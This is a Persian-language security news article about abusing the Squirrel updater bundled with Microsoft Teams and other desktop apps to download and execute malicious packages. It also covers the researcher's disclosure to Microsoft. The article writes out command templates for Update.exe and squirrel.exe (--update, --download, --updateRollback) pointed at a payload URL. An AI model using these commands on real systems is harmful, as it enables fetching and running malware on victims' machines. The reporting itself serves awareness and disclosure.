سوءاستفاده از برنامه Microsoft Teams برای دانلود و اجرای بسته‌‌های مخرب

مکانیزم فعلی آپدیت نسخه کامپیوتری برنامه Microsoft Teams به نحوی است که می توان از آن برای دانلود و اجرای فایل های مخرب در سیستم قربانی استفاده کرد.

همین ایراد در نسخه کامپیوتری نرم افزارهای Github، Whatsapp و Uipath هم وجود دارد با این تفاوت که در این برنامه ها تنها دانلود ویروس انجام می گیرد و امکان اجرای راه دور آن وجود ندارد.

این برنامه ها برای مدیریت مراحل نصب و آپدیت خودشان از پروژه کد باز Squirrel استفاده می کنند، که از برنامه NuGet برای ساخت بسته های مورد نظرشان استفاده می کنند.

محققان بسیاری به این نتیجه رسیدند که استفاده از دستور آپدیت توسط یک برنامه آسیب پذیر، احتمال اجرای دستورالعمل های مخرب در سیستم کاربر را افزایش می دهد. همین مشکل در Squirrel.exe وجود دارد.

در مورد برنامه Teams، در پوشه های آن ویروسی اضافه می شود که با دریافت هر کدام از دستور های زیر اجرا می شود:

Update.exe –update [url to payload]

squirrel.exe –update [url to payload]

این روش در مورد دستورات دیگری همچون دانلود هم ممکن است که منجر به دانلود ویروس به شکل بسته NuGET می شود.

Update.exe –download [url to payload]squirrel.exe –download [url to payload]

دستور دیگری که می تواند منجر به دانلود و اجرای کد به صورت همزمان شود:

Update.exe –updateRollback [url to payload]squirrel.exe –updateRollback [url to payload]

این روش در مورد Squirel.exe هم قابل اجرا است که قسمتی از مراحل نصب Teams است. ریگون ریچارد با استفاده از مهندسی معکوس این آسیب پذیری را مورد بررسی قرار داد و در تاریخ ۴ ژوئن گزارش آن را به شرکت مایکروسافت اعلام کرد. این مشکل هنوز هم در این برنامه وجود دارد و مسئولان مایکروسافت اعلام کردند که در آپدیت های بعدی این ایراد را برطرف خواهند ساحت.

تلاش برای مشاهده این تاثیرات در برنامه های GitHub، Whatsappو UiPath تنها منجر به دانلود ویروس گردید و امکان اجرای آن در این برنامه ها وجود نداشت.

به گفته ریچارد با اینکه در این روش نمیتوان از طریق این برنامه ها ویروس را اجرا کرد اما برای دانلود آن کافی است و رقبا و دشمنان افراد یا شرکت ها می توانند از آن استفاده کنند.

البته تیم ریچارد تا زمانی که مایکروسافت پچ رفع ایراد خود را منتشر نکرده بود قصد انتشار و افشاء موضوع را نداشتند.

یکی دیگر از محققان امنیتی تیم قرمز(هکرها) این آسیب پذیری را کشف کرده و آنرا در توییتر مطرح کرد.

در توییت دیگری ریچارد به طور کامل نحوه کشف ایراد و ریشه آن را توضیح داد. همچنین ویدئویی از نحوه حمله احتمالی یک هکر و تزریق ویروس منتشر کرده است.

دیدن ویدئو:

نظرات

نظر (به‌وسیله فیس‌بوک)